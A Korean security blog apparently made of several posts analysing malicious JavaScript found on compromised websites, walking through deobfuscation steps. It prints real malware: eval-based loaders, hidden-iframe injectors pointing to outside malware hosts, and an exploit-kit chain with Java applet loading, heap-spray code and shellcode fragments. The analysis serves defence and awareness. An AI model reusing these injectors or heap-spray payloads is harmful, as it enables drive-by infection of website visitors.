posted by Kwan's 2014. 1. 8. 04:00

우연히 인터넷 검색을 하던 도중 발견한 2012년 해외 포럼에 올라온 글이다. 

Malicious Code Inject: What Does It Do? 라는 것을 보던 중에 오래된 방법이지만 이런 방법도 있구나 해서 적어놓는다.


1. 발견지 포럼(Web Developer Forum) : http://www.webdeveloper.com/forum/showthread.php?261600-Malicious-Code-Inject-What-Does-It-Do (Malicious Code Inject: What Does It Do?)

-> http://oolbrmp.tld.cc/d/404.php?go=1 (window.location _=_ "http://fukbb.com")

--> http://fukbb.com


2. 디코딩 순서 : 초기사이트 접속 -> Base 64 난독화  -> 일부 디코딩 -> Base 64 난독화 -> Blockhole 난독화 -> 디코딩


3. Web Developer Forum - 스샷



4. 난독화 해제

   가. 원본 소스


  나. 1차 디코딩 - 일부 base 64


  다. 2차 디코딩 - 남은 일부 base 64


  라. 3차 디코딩 - Blockhole(최종)


  마. http://oolbrmp.tld.cc/d/404.php?go=1 - window.location 통한 리다이렉팅


  라. 최종 도메인 - fukbb.com



5. 도메인 위치

  가. oolbrmp.tld.cc


  나. fukbb.com


6. 악성스크립트 - 바이러스 토탈 결과

* 바이러스 토탈 업로드 시 악성 스크립트 부분만 발췌해서 업로드 했습니다.



6. 번외편 - 이것의 결과는?

- 힌트 : HTML-CSS

* &lt; - 부등호(<)

* &gt; - 부등호(>)

* &quot; - 쌍따옴표(") 하나 

 &lt;

 script&gt;

 try

 {

   q=document.createElement(&quot;

   p&quot;

   );

   q.appendChild(q+&quot;

   &quot;

   );

 }

 catch(qw)

 {

   h=-012/5;

   try

   {

     bcsd=prototype-2;

   }

   catch(bawg)

   {

     ss=[];

     f=(h)?(&quot;

     fromCharC&quot;

     +&quot;

     ode&quot;

     ):&quot;

     &quot;;

     e=window[&quot;

     e&quot;

     +&quot;

     val&quot;

     ];

     n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,

198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,

204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,

117,218,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,

312,464,116,224,174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,

52,92,336,416,112,126,309,444,61,98,117,128,119,210,300,464,104,122,117,196,48,78,96,416,101,210,

309,416,116,122,117,196,48,78,96,460,116,242,324,404,61,78,354,420,115,210,294,420,108,210,348,

484,58,208,315,400,100,202,330,236,112,222,345,420,116,210,333,440,58,194,294,460,111,216,351,

464,101,118,324,404,102,232,174,192,59,232,333,448,58,96,177,156,62,120,141,420,102,228,291,436

,101,124,102,164,59,26,27,36,125,26,27,36,102,234,330,396,116,210,333,440,32,210,306,456,97,218,

303,456,40,82,369,52,9,18,27,472,97,228,96,408,32,122,96,400,111,198,351,436,101,220,348,184,99,

228,303,388,116,202,207,432,101,218,303,440,116,80,117,420,102,228,291,436,101,78,123,236,102,92,

345,404,116,130,348,464,114,210,294,468,116,202,120,156,115,228,297,156,44,78,312,464,116,224,

174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336

,416,112,126,309,444,61,98,117,164,59,204,138,460,116,242,324,404,46,236,315,460,105,196,315,

432,105,232,363,244,39,208,315,400,100,202,330,156,59,204,138,460,116,242,324,404,46,224,333

,460,105,232,315,444,110,122,117,388,98,230,333,432,117,232,303,156,59,204,138,460,116,242,324,

404,46,216,303,408,116,122,117,192,39,118,306,184,115,232,363,432,101,92,348,444,112,122,117,

192,39,118,306,184,115,202,348,260,116,232,342,420,98,234,348,404,40,78,357,420,100,232,312

,156,44,78,147,192,39,82,177,408,46,230,303,464,65,232,348,456,105,196,351,464,101,80,117,416,

101,210,309,416,116,78,132,156,49,96,117,164,59,26,27,36,9,200,333,396,117,218,303,440,116,92,

309,404,116,138,324,404,109,202,330,464,115,132,363,336,97,206,234,388,109,202,120,156,98,222,

300,484,39,82,273,192,93,92,291,448,112,202,330,400,67,208,315,432,100,80,306,164,59,26,27,36,

125];

     if(window.document)for(i=6-2-1-2-1;-581+i!=2-2;i++)

     {

       k=i;

       ss=ss+String[f](n[k]/(i%(h*h)+2-1));

     }

     e(ss);

   }

 }

 &lt;

 /script&gt;


글 중간에 바이러스 토탈 결과를 보듯이 난독화가 된 악성 스크립트의 차단 비율은 그다지 높지 않는거 같다. 또한, 이처럼 단순 난독화가 아닌 현재 국내에서 다수 나타나고 있는 공다팩처럼 복잡하게 난독화된 기술은 더욱 탐지하기 힘들것으로 보이며 악성링크를 사전에 차단을 통해 피해를 줄이는 방안도 하나의 방법이라고 생각한다. 하지만, 어느 한편의 입장에서는 악성링크를 통해 다운로드되는 파일만 막으면 되지 라는 말도 할 수 있다. 어떻게 보면 이 둘다 맞는 말이라고 할 수도 있다. 그러나 한번에 한마리의 토끼를 잡는것 보다 한번에 두마리 토끼를 잡는 방법도 있듯이 두마리의 토끼를 한번에 잡는다면 주말에 안심하고 웹서핑을 할 수 있지 않을까 하는 생각이 된다.


댓글을 달아 주세요

  1. tra 2014.02.08 09:46  Addr  Edit/Del  Reply

    샘플파일 원츄 +_+

posted by Kwan's 2013. 1. 24. 20:10

발견지 : http://integridesign.com/David/index.php?target=contact

* 위 페이지 접속시 악성스크립트에 감염 될 수도 있습니다!


위와같이 사이트 접속시 정상 스크립트 내에 이와같이 알수 없는 문구들로 이어진 스크립트를 발견 할 수 있습니다!


</body>

</HTML>

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f766e627

57974612e636f2e62652f666f72756d2e7068703f74703d3637356561666563343331623166373222207

7696474683d223122206865696768743d223122206672616d65626f726465723d223

[생략]";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>


<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65

726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d363735656166656334333162316

63732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223

e3c[생략]";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>


<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6c6f63

756d7265736f75726365732e636f6d2f666f72756d2e7068703f74703d3637356561666563343331623

1663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230

223e[생략]";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>


잠깐 확인을 해보자면 이 코드는 간단하다.

 "var t" 로 지정되어있는 값이 String.fromCharCode 거쳐 eval 함수에서 출력이 된다 !

알수 없이 이어진 숫자들은 바로 16진수 HEX 코드이다.

HEX 코드를 다시 문자열로 변환하는 방법은 아스키 코드표를 보면 쉽게 스크립트가 어디로 연결 되어 있는지를 볼 수 있다 !


Decode 를 해보면 연결되는 사이트는 다음과 같다 !


document.write('<iframe src="http://vnbuyta.co.be/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')


=========================

Server IP(s):

0.0.0.0

=========================


document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')


=========================

Server IP(s):

0.0.0.0

=========================


document.write('<iframe src="http://locumresources.com/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')


=========================

Server IP(s):

0.0.0.0

=========================


해당 사이트들은 현재 접속이 되고 있지 않다 !


하지만 스크립트를 보면서 조금만 문구를 변경하여도 못잡는것이 마음이 안타까웠다.....

문구를 var t -> var x 로 바꾸면 진단 못하는게 너무 허무하기도 하고 안타깝기도 했다.

역시 최선은 사용자가 접속하기 전에 미리 차단을 해버리는것이 제일 사용자를 지키는 일인거 같다!


댓글을 달아 주세요

posted by Kwan's 2012. 6. 30. 10:07

최초 감염 페이지 : http://inews24.cox/js_lib/slide_new.js

                          http://lzxvx.com/pix/rot.html

                          http://lzxvx.com/pix/ll.html

                                ~>최종 파일 : http://oppo.ltevc.com/csx/8191i.css

                                ~> <iframe src=nBQVd.html>

                                ~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css

                                ~> <iframe src=utEWY.html>

                                 ~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css

                            http://lzxvx.com/pix/swfobject.js

                            http://lzxvx.com/pix/jpg.js



var Yszz1="%59"+"%73"+"%7A"+"%7A"+"%30"+"%30";var Yszz2="%78"+"%78"+"%6F"+"%6F"+"%78"+"%78";var Yszz3="%30"+"%30";var pkucde =Yszz1+Yszz2+Yszz3,AVgHbu2f=unescape,cu1l2lp3s2z="WdQOuGkE6OzRFoogdm06G5/

ZwORxIFg6MUdLmoM5TsOjunE3gpAu2UamKTbHI579p8YjKzukIY0iiGPnAzuoELwFCBvivDq

Vsp0xEJqsYhv4fmgbTn+l6gS/ZSmfWq7bYYj75F4qDqKDCzsDYf4SUhxtoWikabVa5kxYA61CR

qLyfN4lvEaSErH/pSIFZzVo8h0GQicb2PyxrigX6tUz4e8idBmR9NmHu997aWdIhxnSIhFG7+M+C

WV38iEKKUoOpWsHLNYR408rdFKuBRLVB9mqfzoO/A9Ov5p6WH2GKnXUhZ8p1lKnIAhbrZLrzI

+b5dk84M2M1S118FCy0GHhhq6MDnc3Q2yxcvukLdHaW3kkmd2u+1ZWAvZ0IpXSPAmI6vrv4dy

eq88RSCzeWTubmBD9MFlnEisRNIp/FuGWxDo9EbnmXp6uClXdRfwTgU5iraHQKcZU0ax43fE

Z4FRRdGAk1N66BNBGy8h6iYdsTcOBIJEKWpRWGuwc/4d9CRMnb9p8FOSFgQB+cet/8v4Z6

Eqd9lg9ARlEPRfn/XDfp+QbkH3R3A8JTUZlZ5h4p/qC4WLVHr2AmrA2S3/L4A07CmltBEBCmq

+Spg2Y9yRMZBYr3ZHxryCvJ3aI5CXm79TrJnrf+spRlidyzGSHFPTceqTqnozmJWRhn0sBT3eh

/PM/5cu0EH5gyUCeeJAstulZwOXCA9zrtHmB1KKP//LWZhHZHZx4LSR9swW/U4xCghmBiQO

//qbbXPD+PAkKnb/5j5qT5EjtrD/z+[중략]

/wBrtEEWSiNuj1SdT3xzOTTaM2Di0TPIiXdZ0BPFlDaSYWgxYFVmntCd1D8A9idlpJcQfWH1YK30ve

YjWcwRpgGapbfUUYx0KOdPU/5+Di4brvdJSlwemIjIe2kphz/91BznRNjmkjLLwtrxcJzmDT1NZSQtb

EGAZi3lK+u6YzEXBU9ORYn8kOK1S5uWZfGf7OHXmE6iNUVMYnSl/EVsNR1zVSgNqVcxzFDsMk

Aq6BY61q8tYX2sCfmc+hOOZ+TWM6rOBHvQ5KQBT+JKChWM0ehMxTK2kMNzCNFimMMuXRcw

euE+8Qib7AVU5S3dadoHXmTgMCGQNQxeLHqHY6/yUSShom1BNfHtDbOU3kvtsmejRQsqnRTjfv2

9L3lcWgbf1BupXZ3AUu0rn7Sil5NOavlnkP1acXwnhJZmpLPcPyc59p92nRB14cmtzyuQmy1tx0kZpM

gpQz3uf4IEBq2mouQl7LdEIlTJIngCkkxKkw2zoDx5ri0UxhHj6KqOSHO+lP59zry40nfG3WnO+cpJGGj

xczB4DNgvSG9NCKO9EnYY4fT8Fhc9rfY6DM26vldSdPJY5eOnVNTjIRrijSlbDSgLS9OBTt5A==",MxAAS="%64"+"%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",UAXzqa1="%77"+"%72"+"%69"+"%74"+"%65",Kxllz1z;function Yszz_v1(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)

{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}

return out.join('');}

var kaixindecodeChars=new Array(-1,-1,-1,-1,-1,-1,[중략],1,-1);

MxAAS=AVgHbu2f(MxAAS);

function kaixindecode(str)

{var c1,c2,c3,c4;/*Yszz 0.3*/var i,len,out;len=str.length;i=0;out = "";while(i<len)

{do

{c1=kaixindecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)

break;do

{c2=kaixindecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)

break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do

{c3=str.charCodeAt(i++)&0xff;if(c3==61)

return out;c3=kaixindecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)

break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do

{c4=str.charCodeAt(i++)&0xff;if(c4==61)

return out;c4=kaixindecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)

break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}

return out}

function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)

{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}

if(w){return v.join('').substring(0,sl);}

else{return v.join('');}}

function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)

{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}

if(w){v[v.length]=len;}

return v;}

Kxllz1z=AVgHbu2f(pkucde);

function kaixin(str,Udkz){if(str==""){return"";}

var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}

z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}

return long2str(v,true);}

UAXzqa1=AVgHbu2f(UAXzqa1);

Dz=cu1l2lp3s2z;

Dz=Yszz_v1(kaixin(kaixindecode(Dz), Kxllz1z));window[MxAAS][UAXzqa1] (Dz);


var RWkTTC8=navigator.userAgent.toLowerCase();

if(document.cookie.indexOf("Udz1szV=")==-1 && RWkTTC8.indexOf("bot")==-1 && RWkTTC8.indexOf("spider")==-1 && RWkTTC8.indexOf("linux")==-1)

{

var jHiJb2=deconcept.SWFObjectUtil.getPlayerVersion();

var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="Udz1szV=Yes;path=/;expires="+expires.toGMTString();

var kaixiny=document.createElement('body');

document.body.appendChild(kaixiny);

var kaixinm=deployJava.getJREs()+"";

kaixinm=parseInt(kaixinm.replace(/\.|\_/g,''));

if (kaixinm<=17002)

{

var kaixin=document.createElement('applet');

kaixin.width="1";

kaixin.height="1";

if((kaixinm<=16027 && kaixinm>=16000) || (kaixinm>=15000 && kaixinm<=15031)) 

{

kaixin.archive="WHXgJTUj.jpg";

kaixin.code="GondadGondadExp.class";

kaixin.setAttribute("data","http://oppo.ltevc.com/csx/8191i.css");

document.body.appendChild(kaixin);

}

else if ((kaixinm<=17002 && kaixinm>=17000) || (kaixinm<=16030 && kaixinm>=16000) ||(kaixinm>=15033 && kaixinm<=15000)) 

{

kaixin.archive="pvAjohpE.jpg";

kaixin.code="GondadExp.Ohno.class";

kaixin.setAttribute("xiaomaolv","http://oppo.ltevc.com/css/8191i.css");

kaixin.setAttribute("bn","woyouyizhixiaomaolv");

kaixin.setAttribute("si","conglaiyebuqi");

kaixin.setAttribute("bs","748");

document.body.appendChild(kaixin);

}

}

else {


       var pcss=navigator.userAgent.toLowerCase();

       var UaYcKzD2 = window.navigator.userAgent.toLowerCase();

       var kxkx=deconcept["SWFOb"+"jectU"+"til"]["getPlay"+"erVer"+"sion"]();

       if(((kxkx['major']==10&&kxkx['minor']<=3)&&kxkx['rev']<=183||(kxkx['major']==11&&kxkx['minor']<=1&&kxkx['rev']<=102&&((pcss.indexOf('msie 6.0')>0)||(pcss.indexOf('msie 7.0')>0)||(pcss.indexOf('msie')==-1)))))

{

document.writeln("<iframe src=nBQVd.html><\/iframe>");

}

else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1)) 

        {



      document.writeln("<iframe src=utEWY.html><\/iframe>");

        }

        else

        {

         if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1)) 

         {

               document.writeln("<iframe src=N9TtW.html><\/iframe>");

         }

}

}

}


<iframe src=utEWY.html>


<script>

function heapLib() {

}


heapLib.ie = function(maxAlloc, heapBase) {


    this.maxAlloc = (maxAlloc ? maxAlloc : 65535);

    this.heapBase = (heapBase ? heapBase : 0x150000);

    this.paddingStr = "AA"+"AA";


    while (4 + this.paddingStr.length*2 + 2 < this.maxAlloc) {

        this.paddingStr += this.paddingStr;

    }

    

   

    this.mem = new Array();



    this.flushOleaut32();

}



heapLib.ie.prototype.debug = function(msg) {

    void(Math.atan2(0xbabe, msg));

}


heapLib.ie.prototype.debugHeap = function(enable) {


    if (enable == true)

        void(Math.atan(0xbabe));

    else

        void(Math.asin(0xbabe));

}


heapLib.ie.prototype.debugBreak = function(msg) {

    void(Math.acos(0xbabe));

}



heapLib.ie.prototype.padding = function(len) {

    if (len > this.paddingStr.length)

        throw "Requested padding string length " + len + ", only " + this.paddingStr.length + " available";


    return this.paddingStr.substr(0, len);

}



heapLib.ie.prototype.round = function(num, round) {

    if (round == 0)

        throw "Round argument cannot be 0";


    return parseInt((num + (round-1)) / round) * round;

}



heapLib.ie.prototype.hex = function(num, width)

{

    var digits = "0123456789ABCDEF";


    var hex = digits.substr(num & 0xF, 1);


    while (num > 0xF) {

        num = num >>> 4;

        hex = digits.substr(num & 0xF, 1) + hex;

    }


    var width = (width ? width : 0);


    while (hex.le...%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA

%u1441%u108A%uFA7A%u2[중략]%uBDBD%uBDBD"+"%uEAEA%uEAEA

%uEAEA%uEAEA");

var nops = unescape("%u0c0c%u0c0c");

while (nops.length < 0x80000) nops += nops;

var offset = nops.substring(0, 0x800 - code.length);

var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

while (shellcode.length < 0x40000) shellcode += shellcode;

var block = shellcode.substring(0, (0x80000-6)/2);

heap_obj.gc();

for (var i=1; i < 0xa70; i++)

{

heap_obj.alloc(block);

}


<iframe src=nBQVd.html>


var rcho6 =cWiDmn8+'oxzz5858oxzz5858oxzz10EBoxzz4B5BoxzzC933oxzzB966oxzz03B8

oxzz3480oxzzBD0BoxzzFAE2oxzz05EBoxzzEBE8oxzzFFFFoxzz54FFoxzzBEA3oxzzBDBD

oxzzD9E2oxzz8D1Cox[중략]oxzzEAEA';

var NyzohAW2="d";

         var APgm7 = VHbfXE5(rcho6.replace(/oxzz/g,csbcST4));        

         var kAtq4 = new Array()

         var SPur3 = 0x100000 - (APgm7.length*2 + 0x24 + 0x1000);

         var rbSO2 = "vglQ60d0"+"dvglQ60d0"+"d";

         var mWXJ4 = VHbfXE5(rbSO2.replace(/vglQ6/g,csbcST4));

         try{alert(a,b,c);}

         catch(e)

   {

var Vbfgj1="d";

while(mWXJ4.length < SPur3) mWXJ4 +=mWXJ4;

         var iRre8 = mWXJ4.substring(0, SPur3/2);

         delete mWXJ4;

         for(i=0;i<300;i++) 

         {

              kAtq4[i] = [iRre8+APgm7].join("");    

         } 

    }

         

function LFydVC8()

{


document.write("<embed src='KR3ZE.swf' width=10 height=0></embed>");

}

NyzohAW2="h";

document.getElementById("WFGGY8").onclick();




댓글을 달아 주세요

posted by Kwan's 2011. 2. 19. 17:45

* 본사이트는 악성코드가 있는 사이트를 알려 드립니다.!!

유포지 : http://www.polinews.co.kr
  

[연결 되는 곳]

http://204.188.243.136:7x/page/page.js
http://204.188.243.136:7x/page/vospt.html
http://204.188.243.136:7x/page/vegoa.htm
http://204.188.243.136:7x/page/vtfep.htm

[차례]

  1. page.js 보기
  2. page.js 해석된 코드
  3. vegoa.htm , vtfep.htm 메인코드 보기 !

Page.js 보기 !!


해석된 코드 !!


var figwZPKw1="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
var figwZPKw1="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
var figwZPKw1="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
window["onerror"]=function(){return true;}
var figwZPKw1="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
var figwZPKw1="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
if(window["document"]["cookie"]["indexOf"]('gdrke1Olrtl632165')==-1){
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
 var t7=new window["Date"]();
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
 t7["setTime"](t7["getTime"]()+24*60*60*1000);
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
 window["document"]["cookie"]='gdrke1Olrtl632165=Yes;path=/;expires='+t7["toGMTString"]();
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
 window["document"]["title"]=window["document"]["title"]["replace"](/\<(\w|\W)*\>/,"");
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
var KCgVNZP13="";
 window["document"]["write"](""+"<ifra"+KCgVNZP13+"me src=http://204.188.243.136:7x/page/vtfep.htm width=0 height=0></iframe>");
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
 window["document"]["write"](""+"<if"+KCgVNZP13+"rame src=http://204.188.243.136:7x/page/vegoa.htm width=0 height=0></iframe>");
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
 window["docu"+"ment"]["wri"+"teln"]("<ifr"+KCgVNZP13+"ame src=http:\/\/204.188.243.136:7x\/page\/vospt.html width=0 height=0><\/iframe>");
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
var VMZ6="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";
}
var figwZPKw1="elgh593k7skerg5gsku756egtryutrre8rgh632eara7";

vegoa.htm , vtfep.htm 메인코드 보기 !

1차 스크립트 !!

document.writeln("eval(\'\\40\\40\\15\\12\\40\\107\\110\\117\\60\\120\\105\\122\\153\\141\\65\\66\\70\\71\\67\\61\\75\\47\\100\\105\\113\\115\\46\\125\\60\\103\\144\\65\\144\\142\\100\\105\\113\\115\\46\\125\\60\\103\\143\\71\\143\\71\\100\\105\\113\\115\\46\\125\\60\\103\\70\\67\\143\\144\\100\\105\\113\\115\\46\\125\\60\\103\\71\\62\\71\\62\\100\\105\\113\\115\\46\\125\\60\\103\\144\\60\\144\\64\\100\\105\\113\\115\\46\\125\\60\\103\\144\\141\\144\\143\\100\\105\\113\\115\\46\\125\\60\\103\\143\\145\\144\\70\\100\\105\\113\\115\\46\\125\\60\\103\\143\\145\\71\\63\\100\\105\\113\\115\\46\\125\\60\\103\\144\\60\\143\\71\\100\\105\\113\\115\\46\\125\\60\\103\\144\\64\\144\\143\\100\\105\\113\\115\\46\\125\\60\\103\\144\\70\\144\\141\\100\\105\\113\\115\\46\\125\\60\\103\\71\\63\\143\\71\\100\\105\\113\\115\\46\\125\\60\\103\\144\\62\\144\\145\\100\\105\\113\\115\\46\\125\\60\\103\\71\\62\\144\\60\\100\\105\\113\\115\\46\\125\\60\\103\\144\\60\\144\\64\\100\\105\\113\\115\\46\\125\\60\\103\\144\\141\\144\\143\\100\\105\\113\\115\\46\\125\\60\\103\\143\\145\\144\\70\\100\\105\\113\\115\\46\\125\\60\\103\\70\\141\\71\\62\\100\\105\\113\\115\\46\\125\\60\\103\\70\\70\\70\\65\\100\\105\\113\\115\\46\\125\\60\\103\\70\\143\\70\\145\\100\\105\\113\\115\\46\\125\\60\\103\\70\\142\\70\\70\\100\\105\\113\\115\\46\\125\\60\\103\\70\\141\\70\\145\\100\\105\\113\\115\\46\\125\\60\\103\\146\\67\\71\\63\\100\\105\\113\\115\\46\\125\\60\\103\\144\\141\\143\\144\\47\\73\\15\\12\\110\\103\\141\\154\\162\\105\\122\\147\\154\\150\\62\\63\\145\\66\\65\\66\\62\\61\\66\\40\\75\\40\\50\\107\\110\\117\\60\\120\\105\\122\\153\\141\\65\\66\\70\\71\\67\\61\\133\\47\\134\\170\\67\\62\\134\\170\\66\\65\\134\\170\\67\\60\\134\\170\\66\\143\\134\\170\\66\\61\\134\\170\\66\\63\\134\\170\\66\\65\\47\\135\\50\\57\\100\\105\\113\\115\\46\\125\\60\\103\\57\\147\\54\\40\\47\\134\\170\\62\\65\\134\\170\\67\\65\\47\\51\\51\\73\\40\\40\\15\\12\\15\\12\')");

1차 스크립트 디코더 후 !!

eval('\40\40\15\12\40\107\110\117\60\120\105\122\153\141\65\66\70\71\67\61\75\47\100\105\113\115\46\125\60\103\144\65\144\142\100\105\113\115\46\125\60\103\143\71\143\71\100\105\113\115\46\125\60\103\70\67\143\144\100\105\113\115\46\125\60\103\71\62\71\62\100\105\113\115\46\125\60\103\144\60\144\64\100\105\113\115\46\125\60\103\144\141\144\143\100\105\113\115\46\125\60\103\143\145\144\70\100\105\113\115\46\125\60\103\143\145\71\63\100\105\113\115\46\125\60\103\144\60\143\71\100\105\113\115\46\125\60\103\144\64\144\143\100\105\113\115\46\125\60\103\144\70\144\141\100\105\113\115\46\125\60\103\71\63\143\71\100\105\113\115\46\125\60\103\144\62\144\145\100\105\113\115\46\125\60\103\71\62\144\60\100\105\113\115\46\125\60\103\144\60\144\64\100\105\113\115\46\125\60\103\144\141\144\143\100\105\113\115\46\125\60\103\143\145\144\70\100\105\113\115\46\125\60\103\70\141\71\62\100\105\113\115\46\125\60\103\70\70\70\65\100\105\113\115\46\125\60\103\70\143\70\145\100\105\113\115\46\125\60\103\70\142\70\70\100\105\113\115\46\125\60\103\70\141\70\145\100\105\113\115\46\125\60\103\146\67\71\63\100\105\113\115\46\125\60\103\144\141\143\144\47\73\15\12\110\103\141\154\162\105\122\147\154\150\62\63\145\66\65\66\62\61\66\40\75\40\50\107\110\117\60\120\105\122\153\141\65\66\70\71\67\61\133\47\134\170\67\62\134\170\66\65\134\170\67\60\134\170\66\143\134\170\66\61\134\170\66\63\134\170\66\65\47\135\50\57\100\105\113\115\46\125\60\103\57\147\54\40\47\134\170\62\65\134\170\67\65\47\51\51\73\40\40\15\12\15\12')

최종 스크립트 !!

eval = alert 로 바꾼 후의 메인 스크립트의 모습 !!

---------------------------
Microsoft Internet Explorer
---------------------------

GHO0PERka568971='@EKM&U0Cd5db@EKM&U0Cc9c9@EKM&U0C87cd
@EKM&U0C9292@EKM&U0Cd0d4@EKM&U0Cdadc@EKM&U0Cced8@EKM&U0Cce93
@EKM&U0Cd0c9@EKM&U0Cd4dc@EKM&U0Cd8da@EKM&U0C93c9@EKM&U0Cd2de
@EKM&U0C92d0@EKM&U0Cd0d4@EKM&U0Cdadc@EKM&U0Cced8@EKM&U0C8a92
@EKM&U0C8885@EKM&U0C8c8e@EKM&U0C8b88@EKM&U0C8a8e@EKM&U0Cf793
@EKM&U0Cdacd';

HCalrERglh23e656216 = (GHO0PERka568971['\x72\x65\x70\x6c\x61\x63\x65'](/@EKM&U0C/g, '\x25\x75')); 

~> HCalrERglh23e656216 = (GHO0PERka568971['replace'](/@EKM&U0C/g, '%u'));

---------------------------
확인  
---------------------------

최종 파일인 : http://images.stmaiget.com/imagex/78531563x.Jpg

여기까지 간단하게 나올 수 있습니다 ~


댓글을 달아 주세요

posted by Kwan's 2010. 10. 1. 22:18

어제 게시물 : [악성코드 유포] 알라딘 너희만 유포하냐?? 취업 , 포털 사이트인 우리도 질 수 없다.

전 게시물에 이어서 오늘도 역시 유포가 계속되고 있습니다. 오늘 아침에는 링크가 지워진것을 보았으니 또다시 링크를 삽입하여서 유포중에 있습니다. 빠른 조치가 될 줄 알았지만 지금도 역시 사이트에 접속하면 링크안에 또 다시 악성코드가 자리를 잡고 있음을 확인하였습니다.
왠지 계속 뚫리는거 보니 확인하는게 그때 그때만 하는게 아닌지 생각이 드네요...어제에 쓴 글과 같이 오늘도 역시 실망을 시키지 않는 취업 , 포털사이트 빨리 수정이 되었으면 하네요 . 현재 js 파일 안에는 또 다른 js로 연결되는 아이프레임이 삽입 되어 있습니다.

현재 포털 JS 안에는 아이프레임 형식이아닌 꼬여놓아서 코드를 만들어 놓았습니다

[생략](생략){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){중략};while(c--){if(k[c]){중략}('중략');',[중략]'.split('|'),0,{})) 이런식으로 되어 있습니다.

출력 시키면 : document.write("<iframe src=http://221.xxx.48.xxx/js/si.asp width=0 height=0></iframe>"); 이렇게 나옵니다~

